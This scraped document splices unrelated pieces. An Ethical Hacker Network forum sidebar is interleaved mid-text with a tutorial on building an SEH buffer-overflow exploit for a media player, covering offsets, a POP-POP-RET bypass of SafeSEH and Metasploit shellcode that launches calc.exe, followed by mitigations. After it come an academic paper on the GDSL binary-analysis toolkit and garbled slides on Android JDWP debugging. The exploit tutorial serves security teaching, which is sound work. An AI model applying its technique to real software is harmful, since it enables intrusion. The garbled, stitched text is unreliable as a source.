 Calendar OfEvents : TechnoSecurity 2010 (1)by hoytj
 News Itemsand GeneralDiscussion AboutEH-Net :[Article]-May2010 FreeGiveaway Sponsor- eLearnSecurity(12) by n1p
 News fromthe Outside World: 4th AnnualInformationSecurityLeadershipAchievementsProgram-ISLA-by(ISC)2 (0) byManu Zacharia (-M-)
 GeneralCertification :SANS Training?(7) by Equix3n-
 Network PenTesting : Routerand Firewallquestions (25) byEquix3n-
 GeneralCertification :FITSP - Federal ITSecurityProfessional (2)by BillV
 Network PenTesting : Got inover my headtrying to help myschool, anyonewant to give meguidance? (8) byBane
 GeneralCertification : Ipassed the GCIHexam! (15) byBane
 Other :Spencer Pratt -Cyber SecurityDirector??? (0)by BillV
 CEH -Certified EthicalHacker : CEHpreparation notesprocedure (2) bysachitre
 Other :Hakin9 Magazine(any subscribershere?) (28) byzeroflaw
 Compliance,Regulations &Standards :
 
 
With the application running, select File->Open location/playlist and select the newly created file that contains 1000 ‘\x41’ characters.
 
We can see that only the EBP register has been overwritten with some ‘A’ characters in the yxga dll but not much else. The applicationis also handled by the default windows handler.Standards :HIPAA: SecurityRisk AnalysisMatrix (7) by sil
 Malware :Web Exploits:There’s an Appfor That (0) byKetchup
 Other : Port22 (SSH)OutboundQuestion (5) byDengar13
 Other :DNSSEC RolloutMay CauseInternetSlowdowns:Melbourne ITExec (0) byDark_Knight
 News Itemsand GeneralDiscussion AboutEH-Net :[Article]-April2010 FreeGiveaway Sponsor- CBT Nuggets(12) by Dengar13
 Looking ToHire : SecurityAnalyst PositionAvailable inTampa Bay Area!!(0) by TechRecFL
 PhysicalSecurity : Whereto buy lockpickingtools ? (16) bychrisj
 Haddix :[Article]-Review:eLearnSecurity’sPenetrationTesting Pro (PTP)(21) by Anquilas
 SocialEngineering :Why SocialEngineeringWorks? andtargets to exploit(2) bydalepearson
 Forensics :EnCase training(7) bydalepearson
 GeneralCertification :Finally takingSecurity+ April20th *UpdatePASSED* (18) byalwinuxVote For EH-Netprogenic.com
technorati favePrivacy Noticefor TDCC & All Properties 
 
Let us continue with another 1000 characters. This time using 2000 characters, the application breaks, and, looking at the SEH chainwindow using the debugger (View->SEH Chain), we can see one exception record.
This record points to 0x001AC88. Looking closely at the register window, the EBX register contains our A*2000 characters. EBX contains0x0010A888 which points to the start of our A buffer which continues to 0x0010AC56. Looking at our SEH record again, we can see thatthe end of the buffer is close to this address. It seems highly likely that larger buffers will successfully overwrite this address and as aresult overwrite the SEH record.  From this, we could also work out the correct buffer size with some simple calculation, but what wouldwe learn? So, we try a larger file of 3000 characters.Using this file, the application crashes again and viewing our SEH chain using the debugger (View->SEH Chain), we can see that therecord and associated handler have indeed been overwritten with our crafted file data. At this point, if we use the Shift and F9 keys topass the exception to the application, we will see that this results in an access violation when executing 41414141 or AAAA, and our EIPregister now points to 41414141.
 
The SE handler has been overwritten, and now it becomes interesting. When the exception is handled, EIP will be overwritten with theaddress in the SE Handler.  Since we can control the value in the handler, we can control and therefore redirect execution to shellcodeto launch calc.exe.Find Offsets and Create ExploitWhilst we have now crashed the application and identified a vulnerability, we do not have the correct offsets required to allow executionof our shellcode payload. To do this, we must use some additional tools. There are a range of tools available for this purpose, and youcan even code your own. For this tutorial I prefer to use Metasploit’s range of applications. These are:• Pattern_create.rb• Pattern_offset.rb• Msfencode• MsfpayloadThe first two ruby scripts are used to identify the correct size of the buffer to send to the application. This will allow us to correctly alignor exploit code and shellcode for successful execution. So firstly, we need to identify the buffer length to cause the overflow. Using thepattern_create.rb script, we generate a unique string of length 3000, and plug that into our buffer string which is currently ‘\x41’*3000.So fire up Metasploit in Backtrack or whatever distro you use. Navigate to the metasploit tools folder and output the pattern into a fileor stdout.
  
 With the pattern created, we can copy this unique string into our offset code in our python script. So rather than 3000 A characters, wewill have this string which will overwrite the SEH record. So generate the new file and re-run the media player in the debugger.
Opening the file in the debugger and viewing the resultant crash, we can once again look at our overwritten SEH handler. Rather than41414141, the value is now 71433471 or 71344371 (qC4q from our string), remembering little-endian architecture.
 
We can also view the memory in the stack window by right-clicking on the SE handler and selecting ‘Follow in Address Stack’ to see ourunique string now filling the stack and our SEH Pointer and Handler are easily viewable.
 We now use Metasploit’s pattern_offset.rb to get out offset. Seen below, we enter 71433471 as the value (Metasploit helpfully takesendianess into account :P):
 Our buffer size is 2053! So we use this offset in our python script with some additional characters to definitively map out our buffer andstructure of our exploit. So let’s update the script and execute it again in the media player. Pic 19Once we hit the crash, hit Shift+F9 to hit the handler and pass the exception to the application. From the SEH window, follow theaddress in the stack again, and we can see that our value of CCCCCCCC and the last 4 bytes of our offset buffer form the SEH record.The EIP register also now contains our latest value. So our exploit looks like this so far:[      Junk     ][ Next SEH][SEH Handler][          A*2053        ][    \xcc*4       ]
 
 The code in EIP is just an address and not executable opcodes. We need to continue! So, we will further break it down into distinctiveparts – Junk, SEH Pointer, SEH Handler, and Shellcode. See the updated code below along with resultant debugger information.
 Code Execution & SafeSEH ProtectionIn Windows XP SP1 and later a number of protections were added to prevent this sort of exploit. These include SafeSEH and XORing ofregisters to 0x00000000, so that they can’t be used for shellcode execution. There are plenty of tutorials on the theory of this and willnot be covered in this practical tutorial. References are provided at the end for further reading. But essentially SafeSEH is a compilerfunction and is used to maintain a list of registered exception handlers, failing when they are not used.The main mechanism for bypassing these protections is the use of POP, POP, RETURN instructions.  Performing two POP instructionsremoves the top two entries from the stack and the RETURN instruction will then take the memory address that is now at the top of thestack and execute the instructions at that address.In our case, the next SEH pointer address that we overwrite is also located at ESP+8 when the handler is called.  Now if we overwritethe handler with the address of an external POP, POP, RETURN (some other loaded dll) sequence, we will take the +8 from ESP and thereturn address will now be the next SEH and placed in EIP. This is what we control and in this we will place a jump into our shellcode,which is executed!This may well cause confusion, so viewing it in the debugger may help. The diagrams here -http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ will also help.So firstly, let’s find a POP POP Return in a module that is not SafeSEH compiled. Again, there are a number of tools for this. However, Iuse the Immunity Debugger plugin “!safeseh.” With the application loaded in the debugger, type “!safeseh” in the command window andhit enter.
 This will bring up a SEH table window. Navigate to View->Logs to view allow loaded modules that the plugin has processed and scannedfor the presence of SafeSEH. The modules without the protection are marked as unprotected and will be used to locate a suitable Pop,Pop, Return instruction. Using an application DLL is more reliable, as this will not be dependent on service packs etc.
 
We also need to ensure that the address does not contain and /x00 nulls that would terminate our exploit string. Try using the searchplugin with Immunity and enter the command !search pop r32\npop r32\nret to search for pop, pop, returns. Looking through theresulting log, we can see that all of the media player DLLs are at low memory address and contain problematic \x00s. We need to lookat some system DLLs.
For this I used 0x30010136 which was found as result of Immunity’s plugin. We can also use Metasploits msfpescan with the P flag toidentify a POP POP RETN.
 
So taking this address we need to place it in our script. Our script now looks like the following:
 
Before we can actually run this exploit, we want to set a breakpoint on our SEH overwrite address to confirm that it is being hit. Right-click in the CPU pane and select Go to->Expression, then enter the address of your SEH overwrite instruction and hit OK. Then set abreakpoint on it with F2.
 
Run the exploit file again and view the SEH chain in the debugger. The breakpoint should be visible and highlighted.
 
Then use the Shift + F9 keys to pass the exception to the program. The exception handler should kick in and the breakpoint should behit. To see the POP instructions working, we need to step through the code. We can now use the F7 to step. Keep an eye on the Stackwindow to watch the stack change.
 The addresses get popped off in the stack with the next address to be removed being 0x0010A0C4. With one more pop, the RETNaddress becomes 0x001AC88, as does EIP. We can also change the absolute address to display it as relative to ESP to see it move fromESP+8 to ESP (Right-click: Address->Relative to ESP).
 
 
Continuing with one more F7, we jump to the return address which is 0x001AC88. EIP is also set to this address. We can see that our“\xCC\xCC\xCC\xCC” is now interpreted as executable code, so we now see them as INT3 instructions. Close by we can also see theNOPs we added at the end. This is where we need to get to when our shellcode resides there.
 
In the way of our code execution however is our sehhandler pop pop return code that we used earlier, however it looks mangled as it isbeing interpreted as opcodes. So, we simply need to replace our “\xCC\xCC\xCC\xCC” instructions with a small jump to our NOPs andshellcode.
 
Let’s put that in our python script. So first we add the jump and try a 16 byte jump. We also add a NOP sled to aim for and some“\xCC\xCC\xCC\xCC”s to act as shellcode. This way, if we hit the “shellcode” INT3 our debugger will break, and we will know our jumpis correct. Running the code to our SEH breakpoint and stepping, we can trace to the JMP and see that it works. We could even shortenit if necessary. Now we can add our real shellcode.
 Shellcode GenerationAgain, the task of exploitation is made all the more easy with the use of Metasploit. For shellcode generation we will use msfpayload andmsfencode. Msfpayload generates the shellcode, whilst the msfencode encodes (obviously) the raw shellcode to remove bad characterssuch as null terminators. Our shellcode will simply display the windows calculator. There are numerous payloads in Msfpayload, and Iencourage you to take a look at how each works. The Metasploit Unleashed tutorials cover this in much greater detail (link inreferences).To generate the shellcode, enter the command shown below. This windows/exec payload takes EXITFUNC and CMD as arguments. TheEXITFUNC variable controls how the payload will clean up after itself once it accomplishes its task and CMD is obviously the command torun. The R flag outputs the shellcode in raw format for the encoder.The encoder arguments “e” selects the encoder which in this instance is Alpha Upper. The “b” flag is to remove bad characters. It is notnecessary to use it here, as the Alpha Upper encoder will not use them. The “t” flag is used to select the output format, which is C in
this case. So run the command to get our shellcode for calculator.
 
 
Then copy and paste this code into your exploit python script and run it. This will hopefully crash the application and run the calculator.
 
 
Finally, there we have our executed shellcode delivering the payload. Not very exciting I know. I would also suggest that you now takea look at the 0-day exploit code that is already available on exploitDB and see that our exploit is in fact different! We have useddifferent offsets and safeSEH modules to get the shellcode to run successfully.So, there we have it. That is the process for developing an SEH overflow exploit. We have taken a vulnerable app with an SEH overflowand without any prior knowledge, other than the existence of a vulnerability, we have generated our own working exploit.PreventionSo we have looked at the vulnerability associated with Structured Exception Handlers and methods to exploit such issues. What are themechanisms in place to prevent this sort of exploit?SafeSEHThe main countermeasure offered by Microsoft is the SafeSEH compiler for flag, but as we can see this is easily bypassed through theuse of POP/POP/Return instructions to access modules that are not compiled with SafeSEH. The problem with this protection is that everyapplication dll/module/executable would need to be compiled with this flag to include this protection. There is no real protection toprevent the Handler from being overwritten with our code as demonstrated earlier.Stack Cookies / CanariesThe Stack Cookie is a compiler option that will add some code to a function’s prologue and epilogue code in order to prevent successfulabuse of typical stack-based overflows. When an application starts, a cookie is randomly generated and saved in the function prologue.This cookie is copied to the stack and placed before the saved EBP and EIP which is located between the local variables and the returnaddresses. At function exit, this cookie is compared again with the initial cookie, and, if it is different (as a result of overflow), theapplication terminates. There are a number of methods to bypass these, and these are covered in a number of articles.http://blogs.technet.com/srd/archive/2009/03/16/gs-cookie-protection-effectiveness-and-limitations.aspxhttp://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr
http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdfSEH Overwrite ProtectionRecently in Vista, Win 7 and Server 2008, Microsoft has implemented a new security feature known as SEH Overwrite Protection. SEHOPis an improvement on the concept of Structured Exception Handling and implements more stringent security checks on SEHstructure/chains. The core feature of SEHOP checks the chaining of all SEH structures present on the stack. Focus is on the last handlerin the chain which should have the handler value pointing to our default handler 0xFFFFFFFF in NTDLL seen earlier in this tutorial. It isquite robust protection, but a POC that demonstrates a bypass mechanism is covered here:http://www.sysdream.com/articles/sehop_en.pdfhttp://blogs.technet.com/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspxAdditional mechanisms that attempt to remedy the issue of buffer overflows are also available. These are Data Execution Prevention(DEP) and Address Space Layout Randomisation (ASLR). These significantly increase the difficulty of exploit development in Windowsenvironments. However, a number of bypass mechanisms exist to defeat these protections as well. I may demonstrate these protectionschemes and their use in later articles.Referenceshttp://msdn.microsoft.com/en-us/library/ms680657%28VS.85%29.aspxhttp://www.corelan.be:8800/index.phphttp://grey-corner.blogspot.com/http://www.uninformed.org/http://www.offensive-security.com/metasploit-unleashed/http://www.metasploit.com/http://www.ethicalhacker.netBe sure to stop by Mark Nicholls security blog, isolated-threat, that focuses on malware, shellcode andexploits. After visiting, if there's any tutorials you'd like to see from Mark, feel free to ask. Next >[ Back ]     
© 2010 The Ethical Hacker NetworkJoomla! is Free Software released under the GNU/GPL License.GDSL: A Universal Toolkit for Giving Semantics
to Machine Language
Julian Kranz, Alexander Sepp, and Axel Simon1
Technische Universität München, Institut für Informatik II, Garching, Germany
firstname.lastname@in.tum.de
Abstract. Thestaticanalysisofexecutableprogramshasgainedimpor-
tance due to the need to audit larger and larger programs for security
vulnerabilities or safety violations. The basis for analyzing executables
is the decoding of byte sequences into assembler instructions and giving
a semantics to them. We use our domain specific language GDSL that
facilitates this task to specify Intel x86 semantics. In particular, we show
how simple optimizations of the generated code can drastically reduce its
size. Moreover, since these optimizations are also written in GDSL they
can be re-used with other processor front-ends. Hence, analyses based on
our toolkit can be adapted to several architectures with little change.
1 Introduction
The static analysis of executable programs has gained increasing importance in
the last decade. Reasons are the need to audit larger and larger programs for se-
curity vulnerabilities, the on-line detection of malware in virus scanners, and the
need to verify software in the presence of binary third-party libraries, inline as-
sembler, and compiler-induced semantics. The basis for analyzing executables is
thedecodingofbytesequencesintoassemblerinstructionsandgivingasemantics
to them. The challenge here is one of scalability: a single line in a high-level lan-
guage is translated into several assembler (or “native”) instructions. Each native
instruction, in turn, is translated into several semantic primitives. These seman-
tic primitives are usually given as an intermediate representation (IR) and are
later evaluated over an abstract domain [3] tracking intervals, value sets, taints,
etc. In order to make the evaluation of the semantic primitives more efficient,
atransformer-specification language (TSL) was recently proposed that compiles
the specification of each native instruction directly into operations (transform-
ers) over the abstract domain [6], thus skipping the generation of an IR. These
tailored transformers are then optimized by a standard compiler. Our toolkit
follows the more traditional approach of generating an IR that an analysis later
interprets over the abstract domains. In contrast to the TSL approach, we per-
form optimizations on the IR program that represents a complete basic block
rather than on a single native instruction. We show that the semantics of instruc-
tions can be simplified considerably when taking the surrounding instructions
into account which highlights the optimization potential of using an IR.
1This work was supported by DFG Emmy Noether programme SI 1579/1.
2
stmts ::=stmt|stmt;stmts
stmt ::=var=:intexpr
|var=:int[addr ]
|[addr ]=:intexpr
|ifsexprthenstmtselsestmts
|while sexprdostmts
|cbranch sexpr?addr:addr
|branch (jump|call|ret)addr
|(var:int)∗="id"(linear:int)∗
cmp ::=≤s|≤ u|<s|<u|=|̸=var ::=id|id.int
addr ::=linear:int
linear ::=int·var+linear|int
sexpr ::=linear|arbitrary
|linear cmp :intlinear
expr ::=sexpr
|linear bin linear
|sign-extend linear:int
|zero-extend linear:int
bin ::=and|or|xor|shr|. . .
Fig. 1.The syntax of our RReil (Relational Reverse Engineering Language) IR. The
construct “ :int” denotes the size in bits whereas “ .int” in the varrule denotes a bit
offset.Thestatementsare:assignment,readfromaddress,writetoaddress,conditional,
loop (both only used to express the semantics within a native instruction), conditional
branch, unconditional branch with a hint of where it originated, and a primitive "id".
2 RReil Intermediate Representation
Manyintermediaterepresentationsforgivingsemanticstoassemblerinstructions
exist, each having its own design goals such as minimality [1,4], mechanical
verifiability [5], reversibility [7], or expressivity [1,9]. Our own RReil IR [9],
presentedinFig.1,wasdesignedtoallowforaprecisenumericinterpretation.For
instance, comparisons are implemented with special tests rather than expressed
at the level of bits which is common in other IRs [4–6].
3 The Generic Decoder Specification Language (GDSL)
We developed a domain specific language called GDSL [8] that is best described
as a functional language with ML-like syntax. It features bespoke pattern match-
ing syntax for specifying instruction decoders. Dependability of GDSL programs
is increased by a sophisticated type inference [10] that eliminates the need of
specifying any types. The algebraic data types and a special infix syntax facili-
tates the specification of instruction semantics and program optimizations.
The GDSL toolkit contains a compiler for GDSL as well as decoders, seman-
tic translations and optimizations written in GDSL. The benefit of specifying
optimizations in GDSL is that they can be re-used for any input architecture
since they operate only on RReil. Besides a few instruction decoders for 8-bit
processors, the toolkit provides an Intel x86 decoder for 32- and 64-bit mode
that handles all 897 Intel instructions. In terms of translations into RReil, we
provide semantics for 457 instructions. Of the 440 undefined instructions, 228
are floating point instructions that we currently do not handle since our own
analyzer cannot handle floating point computations. Many of the remaining un-
defined instructions would have to be treated as primitives as they modify or
querytheinternalCPUstateorbecausetheyperformcomputationswhoseRReil
semantics is too cumbersome to be useful (e.g. encryption instructions).
3
a)1val sem-cmovcc insn cond = do
2 size <- sizeof insn.opnd1;
3 dst <- lval size insn.opnd1;
4 dst-old <- rval size insn.opnd1;
5 src <- rval size insn.opnd2;
6
7 temp <- mktemp;
8 mov size temp dst-old;
9
10 _if cond _then
11 mov size temp src;
12
13 write size dst (var temp)
14 endb)1T0 = [32](B)
2if (FLAGS/6) {
3 T0 = [32](A)
4} else {
5}
6B = [32](T0)
7B/32 = [32](0)
Fig. 2.The translator function a) and a translation result b)
4 Writing Semantics using GDSL
As a pure, functional language with algebraic data types and a state monad,
GDSL lends itself for writing translators in a concise way as illustrated next.
4.1 An Example Intel Instruction
The following GDSL example shows the translation of the Intel instruction
cmov. The instruction copies the contents of its source operand to its destination
operand if a given condition is met. The instruction contains a condition (which
is part of the opcode) and two operands, one of which can be a memory location.
The translation of the instruction instance cmovz ebx, eax (using the Intel x86
architecture with the 64 bit extension) into RReil is shown in Fig. 2b). In or-
der to illustrate the translation, we first detail the output of the GDSL decoder
which is a value of the algebraic data type insnthat is defined as follows:
type insn = # an x86 instruction
CMOVZ of {opnd1: opnd, opnd2: opnd}
| ... # other instruction definitions omitted
Thus, the CMOVZconstructor carries a record with two fields as payload. Both
fields are of type opndwhich, for instance, carry a register or a memory location:
type opnd = # an x86 operand
REG of register
| MEM of memory
| ... # immediates, scaled operands and operands with offsets omitted
Note that all variants (here REGand MEM) implicitly contain information about
the access size. In the example above, the instruction cmovz ebx, eax is repre-
sented by CMOVZ {opnd1 = REG EBX, opnd2 = REG EAX} where EAXis 32-bits. The
following section details helper functions that operate on opndvalues.
4
4.2 Generating RReil statements using GDSL monadic functions
EachsemantictranslatorgeneratesasequenceofRReilstatements.Thesequence
is stored inside the state of a monad. Each RReil statement is represented by
a respective GDSL monadic function which builds the RReil statement from its
arguments and appends it to the current list of statements. The following RReil
generator functions are used in the example:
•mov size destination source
The movfunction generates the RReil movstatement that copies the source
RReil register to the destination RReil register.
•_if condition _then statements
ThisfunctiongeneratestheRReil if·then·elsestatement(withanempty else
branch). The special mix-fix notation _if c _then e is a call to a mix-fix
function whose name is a sequence of identifiers that each commence with an
underscore. For instance, the _if_then function above is defined as follows:
val _if c _then a = do
... # add if cthen aelse {} to statement list
end
Furthermore, the following functions operate on x86 operands. In the context
of the generation of RReil code, this expression is a short form for the RReil
register, memory location, or immediate value associated with the x86 operand:
•sizeof x86-operand
Returns the size of an x86 operand in bits; here, sizeof (REG EBX) = 32 .
•lval size x86-operand
The lvalfunction turns an x86 operand into an RReil left hand side expres-
sion, that is, either varor[addr]. Here, lval 32 (REG EBX) yields the RReil
register Bthat contains the 32 bits of the Intel EBXregister.
•rval size x86-operand
The rvalfunction turns an x86 operand into an RReil expr. In the exam-
ple, rval 32 (REG EAX) yields the RReil register A.
•write size destination source
Thewritefunctionemitsallstatementsnecessarytowritetoanx86operand.
The operand is specified using the destination parameter; it is the return
value of an associated call to lval. In Fig. 2 (b) lines 6 through 7 originate
from the call to write.
Finally, the mktempfunction is used to allocate a temporary variable.
4.3 The Translator
The translation function for cmovz ebx, eax is shown in Fig. 2a). The do ...
endnotation surrounding the function body is used to execute each of the
5
t0 = :32eax - ebx
CF = :1eax <u:32ebx
CForZF = :1eax≤u:32ebx
SFxorOF = :1eax <s:32ebx
SFxorOForZF = :1eax≤s:32ebx
ZF = :1eax=:32ebx
SF = :1t0<s:320
OF = :1SFxorOF xor SF
cbranch SFxorOF ? nxt : tgt⇒
dead-code
eliminationSFxorOF = :1eax <s:32ebx
cbranch SFxorOF ? nxt : tgt
⇓forward
expression
substitution
cbranch eax <s:32ebx ? nxt : tgt
Fig. 3.Translation of the native Intel instructions cmp eax, ebx; jl tgt into RReil
and applying optimizations. Here, CForZF,SFxorOF,SFxorOForZF arevirtual flags , that
is, translation-specific variables whose value reflect what their names suggest [9]. Note
that this example is idealized since the removed flags may not actually be dead.
enclosed monadic functions in turn. The decoded Intel instruction is passed-in
using the insnparameter; the condition is determined by the caller depending
on the actual mnemonic. The condition is an one-bit RReil expression. In the
cmovz ebx, eax example, it is FLAGS/6which corresponds to the zero-flag.
The translation itself starts with a code block that is very common in in-
struction semantics: The operation’s size is determined by looking at the size of
one operand (line 2) and the respective operands are prepared for reading (us-
ing the rvalmonadic function) and writing (using the lvalmonadic function).
Next, a new temporary RReil register is allocated and initialized to the current
value of the destination operand (lines 7 and 8). This completes all prepara-
tions; the actual semantics of the instruction is implemented by the code lines
10 through 11. The condition is tested and, if it evaluates to true, the source
operand is copied to the destination operand. It is important to note that the
condition is not evaluated at translation time, but at runtime by RReil. Finally,
the (possibly) updated value of the temporary RReil register is written to the
corresponding Intel register by code line 13.
One might think that the instruction pointlessly reads the source operand
and writes the destination operand in case the condition evaluates to false. It is,
however, necessary since the writeback can also cause further side effects that
still need to occur, even if no data is copied. This is visible in Fig. 2 (b). Since
the instruction uses a 32 bit register in 64 bit mode, the upper 32 bits of the
register are zeroed even if the lower 32 bits are unchanged (see line 7). This is
done by the writefunction.
5 Optimizing the RReil Code
The design of RReil also allows for an effective optimization of the IR which is
illustrated in Fig. 3. The example shows the typical code bloat when translat-
ing two native instructions where the first sets many flags of which the second
only evaluates one. In order to reduce the number of statements, we translate
a complete basic block and remove all assignments to dead variables. The next
sections consider two optimizations, one of which is currently implemented.
6
5.1 Liveness Analysis and Dead Code Elimination
Theoptimizationstrategyweimplementisadead-codeeliminationusingaback-
wards analysis on the IR code. To this end, we first need to obtain a set of live
variables to start with. A simple approach assumes that all variables are live
at end of the block. This has the drawback that assignments to variable that
are always overwritten in the succeeding blocks cannot be removed. We address
this problem by refining the live-set for basic blocks that do not jump to com-
puted addresses: Specifically, we infer the live variable set of the immediately
succeeding blocks and use this live set as start set, thereby removing many more
assignments to dead variables. We perform a true liveness analysis, that is, we
refrain from marking a variable as live if it is used in the right-hand side of
an assignment to a dead variable. For the body of while loops, however, this
approach would require the calculation of a fixpoint. Since whileloops are used
rarely by our translator and since their bodies show little potential for opti-
mization, a more conservative notion of liveness is used that does not require a
fixpoint computation. This approach marks a variable as live even if it used in
an assignment to a dead variable. With this strategy, the dead code elimination
takes linear time in the size of the basic block.
5.2 Forward Expression Substitution
In the future, we plan to also perform forward substitution and simplifica-
tion. These optimizations become important for architectures like ARM where
most instructions may be executed conditionally, depending on a processor flag.
Compilers use this feature to translate small bodies of conditionals without
jumps. Consider a conditional whose body translates to two native instructions
i1;i2that are executed if fholds. These are translated into the RReil state-
mentsiffthen[ [i1] ]else; ;iffthen[ [i2] ]else;which ideally should be simplified to
iffthen[ [i1] ]; [ [i2] ]else;. Without this optimization, a static analysis will compute
a join of the unrelated states of the then- andelse-branches of the first if-
statement. The thereby incurred loss of precision is particularly problematic for
the TSL approach since each instruction is executed on a single domain that, in
general, will not be able to join two states without loss of precision.
6 Empirical Evaluation
We measured the impact of our dead-code elimination on a linear sweep disas-
sembly of standard Unix programs. Each basic block, that is, a sequence of Intel
instructions up to the next jump, is translated into semantics. Column ‘native
loc’ in Fig. 4 lists the number of native instructions found in its .textsection of
each benchmark. Column ‘non-opt’ shows that the increase in number of lines
of code (loc) is about 6-fold. The next triple column ‘single’ shows how per-
forming liveness analysis and dead code elimination on the semantics of a single
instruction reduces the size by about 7%. Performing this optimization on the
7
program native non-opt intra inter
locloc time loc time red loc time red
bash 144k907k 9.69s 640k 3.06m 29.53% 454k 7.85m 49.98%
cat 668539k 0.39s 28k 8.11s 29.87% 21k 18.44s 45.55%
echo 274215k 0.15s 11k 3.20s 28.74% 8323 7.09s 46.25%
less 21k152k 1.40s 105k 30.76s 30.93% 61k 75.18s 59.90%
ls 15k106k 0.97s 66k 21.55s 37.96% 49k 52.49s 53.76%
mkdir 687045k 0.41s 29k 9.27s 35.31% 21k 21.77s 52.71%
netstat 15k86k 0.82s 63k 17.01s 26.04% 53k 36.37s 38.51%
ps 13k68k 0.69s 45k 14.71s 33.52% 40k 29.49s 41.51%
pwd 333019k 0.18s 14k 3.87s 27.02% 11k 8.50s 43.11%
rm 790347k 0.48s 33k 9.59s 30.09% 25k 23.13s 47.01%
sed 860854k 0.54s 37k 11.10s 31.36% 28k 26.80s 48.55%
tar 50k317k 3.21s 215k 64.11s 32.33% 161k 2.68m 49.23%
touch 750647k 0.49s 31k 9.40s 34.43% 23k 24.87s 50.71%
uname 268415k 0.15s 11k 3.11s 27.78% 8288 6.82s 45.19%
Xorg 346k2081k 23.36s 1408k 7.00m 32.33% 1067k 18.26m 48.70%
Fig. 4.Evaluating the reduction of the IR due to dead-code optimization (considering
succeeding blocks), showing x86 and IR instructions. All times were obtained on an
Intel Core i5 running at 3.20Ghz.
whole basic block yields the result in column ‘intra’ where already a third of
the instructions is identified as redundant. The ‘inter’ columns show the result
of computing the liveness information as described in Sect. 5.1: in case the de-
coded basic block ends in a direct jump, the (one or two) basic blocks that are
branched-to are decoded, translated and their set of live variables is computed.
Using this refined liveness set, the dead code optimization is able to remove be-
tween 40% and 60% of lines relative to the non-optimized semantics. Thus, by
applying dead code elimination using the information in the neighboring basic
blocks only, our semantics of Intel instructions is roughly 3 times larger than the
size of the native disassembly.
In order to compare our translation into RReil with the TSL approach [6]
where a bespoke abstract transformer is generated for each native instruction,
consider again column ‘single’ of Fig. 4. Since this column shows the reduc-
tion when only considering the semantics of a single instruction, it provides an
estimate of how many abstract transformers in a TSL translation a standard
compiler can remove due to dead code elimination. While the TSL translations
are optimized otherwise, it is questionable if this can rival the effect of removing
not 7%, but around 50% of instructions, as our inter-basic block analysis does.
The running times of our current implementation are dominated by the live-
ness analysis. We are confident that we can reduce the overhead of our opti-
mizations considerably by using better data structures. However, even with our
current implementation, it likely that any non-trivial analysis will benefit from
the reduction of the IR more than it will suffer from the additional overhead of
our liveness analysis. Indeed, for code that is not self-modifying, all basic block
could be translated up-front and their translation be re-used.
8
Given these benefits, we hope that our open-source1GDSL toolkit becomes
an attractive front-end for any analysis targeting executable programs.
7 Future Work
Future work will extend our toolkit with decoders and translations for other
architectures. In particular, it would be interesting to mechanically translate
the verified bit-level ARM semantics [5] into RReil. Moreover, given that an
analysis that features a GDSL front-end can handle any architecture specified
in GDSL, we hope for contributions from the community to further extend the
range of architectures that GDSL offers. GDSL would also lend itself for defining
semantics besides the RReil value semantics, namely energy or timing semantics.
In the long run, we hope that the GDSL toolkit will become the preferred
choice for analyzing machine code, thereby replacing proprietary decoders (such
as the popular xed2 decoder from Intel’s PIN toolkit [2]) that are often equipped
with a minimal, application-specific semantics covering only a few instructions.
References
1. S. Bardin, P. Herrmann, J. Leroux, O. Ly, R. Tabary, and A. Vincent. The BIN-
COAFrameworkforBinaryCodeAnalysis. In Computer Aided Verification ,LNCS,
pages 165–170. Springer, 2011.
2. Intel Corp. xed2. http://www.pintool.org , 2012.
3. P. Cousot and R. Cousot. Static Determination of Dynamic Properties of Pro-
grams. In B. Robinet, editor, International Symposium on Programming , pages
106–130, Paris, France, April 1976.
4. T. Dullien and S. Porst. REIL: A platform-independent intermediate representa-
tion of disassembled code for static code analysis. CanSecWest, Canada, 2009.
5. A. Fox and M. O. Myreen. A Trustworthy Monadic Formalization of the ARMv7
Instruction Set Architecture. In Interactive Theorem Proving , volume 6172 of
LNCS, pages 243–258, Edinburgh, UK, 2010. Springer.
6. J. Lim and T. Reps. A System for Generating Static Analyzers for Machine In-
structions. In L. Hendren, editor, Compiler Construction , volume 4959 of LNCS,
pages 36–52. Springer, 2008.
7. N. Ramsey and M. F. Fernández. Specifying Representations of Machine Instruc-
tions.Trans. of Programming Languages and Systems , 19(3):492–524, May 1997.
8. A. Sepp, J. Kranz, and A. Simon. GDSL: A Generic Decoder Specification Lan-
guage for Interpreting Machine Language. In Tools for Automatic Program Anal-
ysis, ENTCS, Deauville, France, September 2012. Springer.
9. A. Sepp, B. Mihaila, and A. Simon. Precise Static Analysis of Binaries by Extract-
ing Relational Information. In M.Pinzger and D. Poshyvanyk, editors, Working
Conference on Reverse Engineering , Limerick, Ireland, October 2011. IEEE Com-
puter Society.
10. A.Simon. DerivingaCompleteTypeInferenceforHindley-MilnerandVectorSizes
using Expansion. In Partial Evaluation and Program Manipulation , SIGPLAN,
Rome, Italy, January 2013. ACM.
1The toolkit is available at https://bitbucket.org/jucs/gdsl/srcMathewSRowleySDebuggersSareSreallySpowerfulSgSPwningSallSofStheS•ndroidSthings
Thursday, September 19, 13
WhatSisSthisStalkSabouty•DebuggingSisSgoodSduringSdevelopmentfSbutSwhatSifSyouSdon’tShaveSsourcey•HowStoSuseS•ndroid’sSdebuggerSinterfaceStoSdoSwhateverSyouSwantStoSanS•ndroidSapplication•JDWP•NewSscriptableSdebuggingSframework•NewStoolsSwrittenSonStheSframework
Thursday, September 19, 13
JDWPSÿackground
Thursday, September 19, 13
JDWPSÿackground•JDISgSJavaSDebugSInterfaceS•JDWPSgSJavaSDebugSWireSProtocolS•JVMSTISgSJavaSVMSToolSInterface
Thursday, September 19, 13
JDWPSConnections•comhsunhjdihCommandLineLaunch•comhsunhjdihProcess•ttach•comhsunhjdihSocket•ttachSgSThisSisSwhatSweSwantSforS•ndroid
Thursday, September 19, 13
HowStoSinitiateSaSconnectionhhh
Thursday, September 19, 13
facepalm or head against wall gifThursday, September 19, 13
JDWPSProblems•LotsSofSdocumentation•httpj__docs]oracle]com_javase_g_docs_technotes_guides_jpda_architecture]html•httpj__docs]oracle]com_javase_g_docs_jdk_api_jpda_jdi_index]htmlooverview[summary]html•MinimalStoSnoSsampleScode•vindJlib_tools]jarJinJSt“JStraceWJjdbWJjavadtT
Thursday, September 19, 13
Debuggery
Thursday, September 19, 13
